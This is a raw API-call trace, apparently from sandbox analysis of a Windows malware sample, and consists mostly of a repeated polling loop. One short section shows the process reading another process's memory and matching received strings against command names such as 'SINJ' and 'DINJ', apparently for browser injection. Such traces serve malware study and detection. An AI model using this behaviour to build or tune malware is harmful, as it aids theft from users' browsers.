	[0237.761] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.761] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.761] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.761] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.761] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.761] Sleep (dwMilliseconds=0xbb8) 
	[0237.776] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.776] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.776] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.776] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.776] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.776] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.776] Sleep (dwMilliseconds=0xbb8) 
	[0237.791] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.791] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.791] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.791] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.791] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.792] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.792] Sleep (dwMilliseconds=0xbb8) 
	[0237.807] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.807] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.807] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.807] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.807] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.807] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.807] Sleep (dwMilliseconds=0xbb8) 
	[0237.823] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.823] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.823] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.823] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.823] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.823] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.823] Sleep (dwMilliseconds=0xbb8) 
	[0237.838] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.838] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.838] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.838] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.838] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.838] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.839] Sleep (dwMilliseconds=0xbb8) 
	[0237.854] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.854] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.854] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.854] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.854] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.854] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.854] Sleep (dwMilliseconds=0xbb8) 
	[0237.870] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.870] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.870] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.870] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.870] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.870] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.870] Sleep (dwMilliseconds=0xbb8) 
	[0237.885] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.885] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.886] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.886] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.886] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.886] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.886] Sleep (dwMilliseconds=0xbb8) 
	[0237.901] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.901] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.901] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.901] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.901] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.901] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.901] Sleep (dwMilliseconds=0xbb8) 
	[0237.917] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.917] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.917] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.917] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.917] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.917] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.917] Sleep (dwMilliseconds=0xbb8) 
	[0237.932] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.932] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.932] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.932] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.932] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.932] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.933] Sleep (dwMilliseconds=0xbb8) 
	[0237.948] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.948] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.948] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.948] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.948] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.948] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.948] Sleep (dwMilliseconds=0xbb8) 
	[0237.963] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.963] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.963] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.963] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.963] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.963] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.963] Sleep (dwMilliseconds=0xbb8) 
	[0237.990] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.990] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.991] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.991] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.991] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.991] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.991] Sleep (dwMilliseconds=0xbb8) 
	[0237.994] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0237.995] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0237.995] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0237.995] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0237.995] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0237.995] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0237.995] Sleep (dwMilliseconds=0xbb8) 
	[0238.010] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.010] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.010] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.010] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.010] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.010] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.010] Sleep (dwMilliseconds=0xbb8) 
	[0238.026] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.026] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.026] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.026] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.026] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.026] Sleep (dwMilliseconds=0xbb8) 
	[0238.042] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.042] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.042] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.042] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.042] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.042] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.042] Sleep (dwMilliseconds=0xbb8) 
	[0238.057] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.057] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.057] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.057] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.057] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.057] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.057] Sleep (dwMilliseconds=0xbb8) 
	[0238.073] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.073] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.073] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.073] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.073] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.073] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.073] Sleep (dwMilliseconds=0xbb8) 
	[0238.088] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.088] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.089] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.089] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.089] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.089] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778488) returned 1
	[0238.089] Sleep (dwMilliseconds=0xbb8) 
	[0238.104] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.104] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.104] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.104] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.104] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.104] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27782f8) returned 1
	[0238.104] Sleep (dwMilliseconds=0xbb8) 
	[0238.120] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.120] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.120] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.120] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.120] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.120] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27782f8) returned 1
	[0238.120] Sleep (dwMilliseconds=0xbb8) 
	[0238.135] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0238.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0238.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0238.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225da8
	[0238.135] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0238.135] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0238.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0238.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fff48
	[0238.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x22fff48, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0238.135] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0238.135] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225da8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225da8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0238.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0238.135] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778758
	[0238.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225da8, cbMultiByte=-1, lpWideCharStr=0x2778758, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0238.135] SetEvent (hEvent=0x474) returned 1
	[0238.135] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0238.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0238.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225da8) returned 1
	[0238.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778190
	[0238.136] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0238.136] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0238.136] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0238.136] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0238.136] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0238.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff2d0
	[0238.136] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27782f8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xba0) returned 0x620
	[0238.136] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2778708
	[0238.136] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.136] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.136] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.136] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.136] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778708) returned 1
	[0238.137] Sleep (dwMilliseconds=0xbb8) 
	[0238.151] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.151] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.151] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.151] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.151] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.151] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2778708) returned 1
	[0238.151] Sleep (dwMilliseconds=0xbb8) 
	[0238.188] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.188] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.188] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.188] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.188] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.188] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0238.189] Sleep (dwMilliseconds=0xbb8) 
	[0238.199] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.199] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.199] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.200] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.200] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.200] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0238.200] Sleep (dwMilliseconds=0xbb8) 
	[0238.213] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.213] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.214] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.214] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.214] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.214] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0238.214] Sleep (dwMilliseconds=0xbb8) 
	[0238.231] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.231] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.231] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.231] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.231] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.231] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x231ef48) returned 1
	[0238.231] Sleep (dwMilliseconds=0xbb8) 
	[0238.244] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.244] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.244] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.244] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.244] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.244] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.244] Sleep (dwMilliseconds=0xbb8) 
	[0238.260] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.260] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.260] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.260] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.260] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.260] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.260] Sleep (dwMilliseconds=0xbb8) 
	[0238.275] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.275] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.276] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.276] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.276] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.276] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.276] Sleep (dwMilliseconds=0xbb8) 
	[0238.292] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.292] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.292] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.292] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.292] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.292] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.292] Sleep (dwMilliseconds=0xbb8) 
	[0238.306] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.306] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.307] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.307] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.307] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.307] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.307] Sleep (dwMilliseconds=0xbb8) 
	[0238.322] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.322] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.322] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.322] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.322] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.322] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.322] Sleep (dwMilliseconds=0xbb8) 
	[0238.338] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.338] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.338] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.338] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.338] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.338] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.338] Sleep (dwMilliseconds=0xbb8) 
	[0238.354] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.355] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.355] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.355] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.355] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.355] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.355] Sleep (dwMilliseconds=0xbb8) 
	[0238.370] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.370] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.370] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.370] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.370] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.370] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bed20) returned 1
	[0238.370] Sleep (dwMilliseconds=0xbb8) 
	[0238.386] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.386] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.386] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.386] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.386] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0238.386] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27bef50) returned 1
	[0238.386] Sleep (dwMilliseconds=0xbb8) 
	[0238.402] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0238.402] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0238.402] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0238.402] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0238.402] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
